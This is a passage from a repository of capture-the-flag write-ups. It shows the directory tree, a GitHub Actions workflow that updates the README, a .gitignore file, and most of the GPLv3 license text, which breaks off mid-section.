├── .github
    └── workflows
    │   └── update-readme.yml
├── .gitignore
├── LICENSE
├── README.md
├── README_top.md
├── contrib.py
├── generate_readme.sh
└── writeups
    ├── breakingbad
        ├── episodio 3
        │   └── rmartinsanta
        │   │   └── rmartinsanta.pdf
        ├── episodio1
        │   ├── bicacaro
        │   │   ├── BREAKING_BAD_EP1.pdf
        │   │   └── web.py
        │   └── masi
        │   │   ├── login_brute_sqli.py
        │   │   └── masi - UAM_BreakingBad_EP1.pdf
        ├── episodio2
        │   ├── arsenics
        │   │   └── Arsenics_Breaking bad episode 2.pdf
        │   └── masi
        │   │   └── masi - UAM_BreakingBad_EP2.pdf
        └── episodio3
        │   └── j0n3
        │       └── Breaking Bad - Episodio 3.pdf
    ├── dragonball
        ├── episodio1
        │   ├── M3n0s_D0n4ld
        │   │   ├── M3n0s_D0n4ld-episodio1.pdf
        │   │   └── a
        │   ├── bicacaro
        │   │   └── bicacaro-episodio1.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio1.pdf
        │   ├── julianjm
        │   │   └── julianjm-episodio1.md
        │   └── nachinho3
        │   │   └── nachinho3-episodio1.pdf
        ├── episodio2
        │   └── j0n3
        │   │   └── j0n3-episodio2.pdf
        └── episodio3
        │   ├── bicacaro
        │       └── bicacaro-episodio3.pdf
        │   ├── julianjm
        │       ├── img
        │       │   ├── uam_he_visto_cosas.jpg
        │       │   ├── uam_init_array.png
        │       │   ├── uam_malloc.png
        │       │   ├── uam_vector_constructor.png
        │       │   ├── uam_xd_cmp_eq.png
        │       │   ├── uam_xd_run.png
        │       │   └── uam_xd_xd.png
        │       └── julianjm-episodio3.md
        │   └── nachinho3
        │       └── nachinho3-episodio3.pdf
    ├── extra
        └── extra
        │   ├── arsenics
        │       └── arsenics-easymode.pdf
        │   ├── darkeagle
        │       └── darkeagle-easymode.pdf
        │   └── j0n3
        │       └── j0n3-easymode.pdf
    ├── futurama
        └── episodio3-1
        │   └── arsenics
        │       └── futurama3.1-bof-Arsenics.pdf
    ├── lacasadepapel
        ├── episodio1-1
        │   ├── alejandroparras
        │   │   └── alejandroparras-episodio1-1.pdf
        │   ├── bicacaro
        │   │   └── bicacaro-episodio1-1.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio1-1.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio1-1.pdf
        │   ├── nachinho3
        │   │   └── nachinho3-episodio1-1.pdf
        │   ├── oreos
        │   │   └── oreos-episodio1-1.txt
        │   ├── percu
        │   │   └── percu-episodio1-1.pdf
        │   ├── rafamartos
        │   │   └── rafamartos-episodio1-1.pdf
        │   ├── selankon
        │   │   └── selankon-episodio1-1.txt
        │   ├── socialkas
        │   │   └── socialkas-episodio1-1.pdf
        │   └── victormanuelleyva
        │   │   └── victormanuelleyva-episodio1-1.txt
        ├── episodio1-2
        │   ├── bicacaro
        │   │   └── bicacaro-episodio1-2.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio1-2.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio1-2.pdf
        │   ├── oreos
        │   │   └── oreos-episodio1-2.txt
        │   └── rafamartos
        │   │   └── rafamartos-episodio1-2.pdf
        ├── episodio2
        │   ├── cesarjz
        │   │   └── cesarjz-episodio2.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio2.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio2.pdf
        │   ├── percu
        │   │   └── percu-episodio2.pdf
        │   ├── rafamartos
        │   │   └── rafamartos-episodio2.pdf
        │   └── victormanuelleyva
        │   │   └── victormanuelleyva-episodio2.txt
        └── episodio3
        │   ├── bicacaro
        │       └── bicacaro-episodio3.pdf
        │   ├── blueudp
        │       └── blueudp-episodio3.py
        │   ├── cesarjz
        │       └── cesarjz-episodio3.pdf
        │   ├── darkeagle
        │       └── darkeagle-episodio3.pdf
        │   ├── j0n3
        │       └── j0n3-episodio3.pdf
        │   └── victormanuelleyva
        │       └── victormanuelleyva-episodio3.txt
    ├── matrix
        ├── episodio1
        │   ├── bicacaro
        │   │   └── bicacaro-episodio1.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio1.pdf
        │   ├── julianjm
        │   │   └── julianjm-episodio1.pdf
        │   └── nachinho3
        │   │   └── nachinho3-episodio1.pdf
        ├── episodio2
        │   ├── darkeagle
        │   │   └── darkeagle-episodio2.pdf
        │   ├── julianjm
        │   │   └── julianjm-episodio2.md
        │   └── nachinho3
        │   │   └── nachinho3-episodio2.pdf
        └── episodio3
        │   ├── arsenics
        │       └── arsenics-episodio3.pdf
        │   ├── darkeagle
        │       └── darkeagle-episodio3.pdf
        │   └── j0n3
        │       └── j0n3-episodio3.pdf
    ├── missions
        ├── mission02
        │   ├── 1v4n
        │   │   └── 1v4n-mission02.txt
        │   └── nachinho3
        │   │   └── nachinho3-mission02.pdf
        ├── mission03
        │   └── nachinho3
        │   │   └── nachinho3-mission03.pdf
        ├── mission04
        │   └── j0n3
        │   │   └── j0n3-mission04.pdf
        ├── mission05
        │   ├── j0n3
        │   │   └── j0n3-mission05.pdf
        │   ├── nachinho3
        │   │   └── nachinho3-mission05.pdf
        │   ├── percu
        │   │   └── percu-mission05.pdf
        │   └── rafamartos
        │   │   └── rafamartos-mission05.pdf
        └── mission06
        │   ├── 1v4n
        │       └── 1v4n-mission06.txt
        │   ├── nachinho3
        │       └── nachinho3-mission06.pdf
        │   └── rafamartos
        │       └── rafamartos-mission06.pdf
    ├── siliconvalley
        ├── episodio1
        │   ├── 1v4n
        │   │   └── 1v4n-episodio1.pdf
        │   ├── arsenics
        │   │   └── arsenics-episodio1.pdf
        │   ├── bicacaro
        │   │   └── bicacaro-episodio1.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio1.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio1.pdf
        │   ├── nachinho3
        │   │   └── nachinho3-episodio1.pdf
        │   ├── percu
        │   │   └── percu-episodio1.pdf
        │   ├── rafamartos
        │   │   └── rafamartos-episodio1.pdf
        │   ├── ramonsola
        │   │   └── ramonsola-episodio1.pdf
        │   ├── rubenansotegui
        │   │   └── rubenansotegui-episodio1.txt
        │   └── tonicastillo
        │   │   └── tonicastillo-episodio1.pdf
        ├── episodio2
        │   ├── 1v4n
        │   │   └── 1v4n-episodio2.pdf
        │   ├── arsenics
        │   │   └── arsenics-episodio2.pdf
        │   ├── bicacaro
        │   │   └── bicacaro-episodio2.pdf
        │   ├── darkeagle
        │   │   └── darkeagle-episodio2.pdf
        │   ├── j0n3
        │   │   └── j0n3-episodio2.pdf
        │   ├── nachinho3
        │   │   └── nachinho3-episodio2.pdf
        │   └── rafamartos
        │   │   └── rafamartos-episodio2.pdf
        └── episodio3
        │   ├── 1v4n
        │       └── 1v4n-episodio3.pdf
        │   ├── bicacaro
        │       └── bicacaro-episodio3.pdf
        │   ├── darkeagle
        │       └── darkeagle-episodio3.pdf
        │   ├── j0n3
        │       └── j0n3-episodio3.pdf
        │   ├── nachinho3
        │       └── nachinho3-episodio3.pdf
        │   └── rafamartos
        │       └── rafamartos-episodio3.pdf
    └── universomarvel
        ├── episodio1-2
            ├── bicacaro
            │   └── bicacaro-episodio1-2.pdf
            ├── darkeagle
            │   └── DarkEagle-episodio1-2.pdf
            ├── j0n3
            │   └── j0n3-episodio1-2.pdf
            ├── julianjm
            │   └── julianjm-episodio1-2.pdf
            ├── masi
            │   └── masi-episodio1-2.txt
            ├── nachinho3
            │   └── nachinho3-episodio1-2.pdf
            ├── oreos
            │   └── oreos-episodio1-2.txt
            └── socialkas
            │   └── socialkas-episodio1-2.pdf
        ├── episodio1
            ├── 1v4n
            │   └── 1v4n-episodio1.pdf
            ├── arsenics
            │   └── arsenics-episodio1.pdf
            ├── bicacaro
            │   └── bicacaro-episodio1.pdf
            ├── darkeagle
            │   └── DarkEagle-episodio1.pdf
            ├── j0n3
            │   └── j0n3-episodio1.pdf
            ├── julianjm
            │   └── julianjm-episodio1.txt
            ├── masi
            │   └── masi-episodio1.txt
            ├── nachinho3
            │   └── nachinho3-episodio1.pdf
            ├── oreos
            │   └── oreos-episodio1.docx
            ├── rafamartos
            │   └── rafamartos-episodio1.pdf
            └── victormanuelleyva
            │   └── victormanuelleyva-episodio1.txt
        ├── episodio2
            ├── arsenics
            │   └── arsenics-episodio2.pdf
            ├── asterixco
            │   └── asterixco-episodio2.pdf
            ├── bicacaro
            │   └── bicacaro-episodio2.pdf
            ├── darkeagle
            │   └── darkeagle-episodio2.pdf
            └── julianjm
            │   └── julianjm-episodio2.pdf
        └── episodio3
            ├── arsenics
                └── arsenics-episodio3.pdf
            ├── bechma
                └── bechma-episdio3.pdf
            ├── bicacaro
                └── bicacaro-episodio3.pdf
            ├── darkeagle
                ├── coordenades.txt
                ├── darkeagle-episodio3.pdf
                └── solve_final.py
            └── julianjm
                └── julianjm-episodio3.pdf


/.github/workflows/update-readme.yml:
--------------------------------------------------------------------------------
 1 | name: Update readme and contributors
 2 | on:
 3 |     push:
 4 |         branches:
 5 |             - 'master'
 6 | 
 7 | jobs:
 8 |     generate-readme:
 9 |       if: github.repository == 'devploit/unaalmes-writeups'
10 |       name: Generate README.md
11 |       runs-on: ubuntu-latest
12 |       steps:
13 |         - name: Checkout Repository
14 |           uses: actions/checkout@v2
15 |         - name: Setup python3
16 |           uses: actions/setup-python@v1
17 |           with:
18 |             python-version: '3.x'
19 |             architecture: 'x64'
20 |         - name: Update README
21 |           run: bash generate_readme.sh
22 |         - name: Create commit and push
23 |           uses: github-actions-x/commit@v2.6
24 |           with:
25 |             github-token: ${{ secrets.GITHUB_TOKEN }}
26 |             push-branch: master
27 |             commit-message: 'Update README.md'
28 |             files: README.md
29 |             rebase: 'true'
30 |             name: 'GH Action Bot'
31 |             email: unaalmes@hispasec.com
32 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .idea/
2 | .DS_Store
3 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 3, 29 June 2007
  3 | 
  4 |  Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
  5 |  Everyone is permitted to copy and distribute verbatim copies
  6 |  of this license document, but changing it is not allowed.
  7 | 
  8 |                             Preamble
  9 | 
 10 |   The GNU General Public License is a free, copyleft license for
 11 | software and other kinds of works.
 12 | 
 13 |   The licenses for most software and other practical works are designed
 14 | to take away your freedom to share and change the works.  By contrast,
 15 | the GNU General Public License is intended to guarantee your freedom to
 16 | share and change all versions of a program--to make sure it remains free
 17 | software for all its users.  We, the Free Software Foundation, use the
 18 | GNU General Public License for most of our software; it applies also to
 19 | any other work released this way by its authors.  You can apply it to
 20 | your programs, too.
 21 | 
 22 |   When we speak of free software, we are referring to freedom, not
 23 | price.  Our General Public Licenses are designed to make sure that you
 24 | have the freedom to distribute copies of free software (and charge for
 25 | them if you wish), that you receive source code or can get it if you
 26 | want it, that you can change the software or use pieces of it in new
 27 | free programs, and that you know you can do these things.
 28 | 
 29 |   To protect your rights, we need to prevent others from denying you
 30 | these rights or asking you to surrender the rights.  Therefore, you have
 31 | certain responsibilities if you distribute copies of the software, or if
 32 | you modify it: responsibilities to respect the freedom of others.
 33 | 
 34 |   For example, if you distribute copies of such a program, whether
 35 | gratis or for a fee, you must pass on to the recipients the same
 36 | freedoms that you received.  You must make sure that they, too, receive
 37 | or can get the source code.  And you must show them these terms so they
 38 | know their rights.
 39 | 
 40 |   Developers that use the GNU GPL protect your rights with two steps:
 41 | (1) assert copyright on the software, and (2) offer you this License
 42 | giving you legal permission to copy, distribute and/or modify it.
 43 | 
 44 |   For the developers' and authors' protection, the GPL clearly explains
 45 | that there is no warranty for this free software.  For both users' and
 46 | authors' sake, the GPL requires that modified versions be marked as
 47 | changed, so that their problems will not be attributed erroneously to
 48 | authors of previous versions.
 49 | 
 50 |   Some devices are designed to deny users access to install or run
 51 | modified versions of the software inside them, although the manufacturer
 52 | can do so.  This is fundamentally incompatible with the aim of
 53 | protecting users' freedom to change the software.  The systematic
 54 | pattern of such abuse occurs in the area of products for individuals to
 55 | use, which is precisely where it is most unacceptable.  Therefore, we
 56 | have designed this version of the GPL to prohibit the practice for those
 57 | products.  If such problems arise substantially in other domains, we
 58 | stand ready to extend this provision to those domains in future versions
 59 | of the GPL, as needed to protect the freedom of users.
 60 | 
 61 |   Finally, every program is threatened constantly by software patents.
 62 | States should not allow patents to restrict development and use of
 63 | software on general-purpose computers, but in those that do, we wish to
 64 | avoid the special danger that patents applied to a free program could
 65 | make it effectively proprietary.  To prevent this, the GPL assures that
 66 | patents cannot be used to render the program non-free.
 67 | 
 68 |   The precise terms and conditions for copying, distribution and
 69 | modification follow.
 70 | 
 71 |                        TERMS AND CONDITIONS
 72 | 
 73 |   0. Definitions.
 74 | 
 75 |   "This License" refers to version 3 of the GNU General Public License.
 76 | 
 77 |   "Copyright" also means copyright-like laws that apply to other kinds of
 78 | works, such as semiconductor masks.
 79 | 
 80 |   "The Program" refers to any copyrightable work licensed under this
 81 | License.  Each licensee is addressed as "you".  "Licensees" and
 82 | "recipients" may be individuals or organizations.
 83 | 
 84 |   To "modify" a work means to copy from or adapt all or part of the work
 85 | in a fashion requiring copyright permission, other than the making of an
 86 | exact copy.  The resulting work is called a "modified version" of the
 87 | earlier work or a work "based on" the earlier work.
 88 | 
 89 |   A "covered work" means either the unmodified Program or a work based
 90 | on the Program.
 91 | 
 92 |   To "propagate" a work means to do anything with it that, without
 93 | permission, would make you directly or secondarily liable for
 94 | infringement under applicable copyright law, except executing it on a
 95 | computer or modifying a private copy.  Propagation includes copying,
 96 | distribution (with or without modification), making available to the
 97 | public, and in some countries other activities as well.
 98 | 
 99 |   To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies.  Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 | 
103 |   An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License.  If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 | 
112 |   1. Source Code.
113 | 
114 |   The "source code" for a work means the preferred form of the work
115 | for making modifications to it.  "Object code" means any non-source
116 | form of a work.
117 | 
118 |   A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 | 
123 |   The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form.  A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 | 
134 |   The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities.  However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work.  For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 | 
147 |   The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 | 
151 |   The Corresponding Source for a work in source code form is that
152 | same work.
153 | 
154 |   2. Basic Permissions.
155 | 
156 |   All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met.  This License explicitly affirms your unlimited
159 | permission to run the unmodified Program.  The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work.  This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 | 
164 |   You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force.  You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright.  Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 | 
175 |   Conveying under any other circumstances is permitted solely under
176 | the conditions stated below.  Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 | 
179 |   3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 | 
181 |   No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 | 
187 |   When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 | 
195 |   4. Conveying Verbatim Copies.
196 | 
197 |   You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 | 
205 |   You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 | 
208 |   5. Conveying Modified Source Versions.
209 | 
210 |   You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 | 
214 |     a) The work must carry prominent notices stating that you modified
215 |     it, and giving a relevant date.
216 | 
217 |     b) The work must carry prominent notices stating that it is
218 |     released under this License and any conditions added under section
219 |     7.  This requirement modifies the requirement in section 4 to
220 |     "keep intact all notices".
221 | 
222 |     c) You must license the entire work, as a whole, under this
223 |     License to anyone who comes into possession of a copy.  This
224 |     License will therefore apply, along with any applicable section 7
225 |     additional terms, to the whole of the work, and all its parts,
226 |     regardless of how they are packaged.  This License gives no
227 |     permission to license the work in any other way, but it does not
228 |     invalidate such permission if you have separately received it.
229 | 
230 |     d) If the work has interactive user interfaces, each must display
231 |     Appropriate Legal Notices; however, if the Program has interactive
232 |     interfaces that do not display Appropriate Legal Notices, your
233 |     work need not make them do so.
234 | 
235 |   A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit.  Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 | 
245 |   6. Conveying Non-Source Forms.
246 | 
247 |   You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 | 
252 |     a) Convey the object code in, or embodied in, a physical product
253 |     (including a physical distribution medium), accompanied by the
254 |     Corresponding Source fixed on a durable physical medium
255 |     customarily used for software interchange.
256 | 
257 |     b) Convey the object code in, or embodied in, a physical product
258 |     (including a physical distribution medium), accompanied by a
259 |     written offer, valid for at least three years and valid for as
260 |     long as you offer spare parts or customer support for that product
261 |     model, to give anyone who possesses the object code either (1) a
262 |     copy of the Corresponding Source for all the software in the
263 |     product that is covered by this License, on a durable physical
264 |     medium customarily used for software interchange, for a price no
265 |     more than your reasonable cost of physically performing this
266 |     conveying of source, or (2) access to copy the
267 |     Corresponding Source from a network server at no charge.
268 | 
269 |     c) Convey individual copies of the object code with a copy of the
270 |     written offer to provide the Corresponding Source.  This
271 |     alternative is allowed only occasionally and noncommercially, and
272 |     only if you received the object code with such an offer, in accord
273 |     with subsection 6b.
274 | 
275 |     d) Convey the object code by offering access from a designated
276 |     place (gratis or for a charge), and offer equivalent access to the
277 |     Corresponding Source in the same way through the same place at no
278 |     further charge.  You need not require recipients to copy the
279 |     Corresponding Source along with the object code.  If the place to
280 |     copy the object code is a network server, the Corresponding Source
281 |     may be on a different server (operated by you or a third party)
282 |     that supports equivalent copying facilities, provided you maintain
283 |     clear directions next to the object code saying where to find the
284 |     Corresponding Source.  Regardless of what server hosts the
285 |     Corresponding Source, you remain obligated to ensure that it is
286 |     available for as long as needed to satisfy these requirements.
287 | 
288 |     e) Convey the object code using peer-to-peer transmission, provided
289 |     you inform other peers where the object code and Corresponding
290 |     Source of the work are being offered to the general public at no
291 |     charge under subsection 6d.
292 | 
293 |   A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 | 
297 |   A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling.  In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage.  For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product.  A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 | 
310 |   "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source.  The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 | 
318 |   If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information.  But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 | 
329 |   The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed.  Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 | 
337 |   Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 | 
343 |   7. Additional Terms.
344 | 
345 |   "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law.  If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 | 
354 |   When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it.  (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.)  You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 | 
361 |   Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 | 
365 |     a) Disclaiming warranty or limiting liability differently from the
366 |     terms of sections 15 and 16 of this License; or
367 | 
368 |     b) Requiring preservation of specified reasonable legal notices or
369 |     author attributions in that material or in the Appropriate Legal
370 |     Notices displayed by works containing it; or
371 | 
372 |     c) Prohibiting misrepresentation of the origin of that material, or
373 |     requiring that modified versions of such material be marked in
374 |     reasonable ways as different from the original version; or
375 | 
376 |     d) Limiting the use for publicity purposes of names of licensors or
377 |     authors of the material; or
378 | 
379 |     e) Declining to grant rights under trademark law for use of some
380 |     trade names, trademarks, or service marks; or
381 | 
382 |     f) Requiring indemnification of licensors and authors of that
383 |     material by anyone who conveys the material (or modified versions of
384 |     it) with contractual assumptions of liability to the recipient, for
385 |     any liability that these contractual assumptions directly impose on
386 |     those licensors and authors.
387 | 
388 |   All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10.  If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term.  If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 | 
398 |   If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 | 
403 |   Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 | 
407 |   8. Termination.
408 | 
409 |   You may not propagate or modify a covered work except as expressly
410 | provided under this License.  Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 | 
415 |   However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 | 
422 |   Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 | 
429 |   Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License.  If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 | 
435 |   9. Acceptance Not Required for Having Copies.
436 | 
437 |   You are not required to accept this License in order to receive or
438 | run a copy of the Program.  Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance.  However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work.  These actions infringe copyright if you do
443 | not accept this License.  Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 | 
446 |   10. Automatic Licensing of Downstream Recipients.
447 | 
448 |   Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License.  You are not responsible
451 | for enforcing compliance by third parties with this License.
452 | 
453 |   An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations.  If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 | 
463 |   You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License.  For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 | 
471 |   11. Patents.
472 | 
473 |   A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based.  The
475 | work thus licensed is called the contributor's "contributor version".
476 | 
477 |   A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version.  For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 | 
487 |   Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 | 
492 |   In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement).  To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 | 
499 |   If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients.  "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 | 
513 |   If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 | 
521 |   A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License.  You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
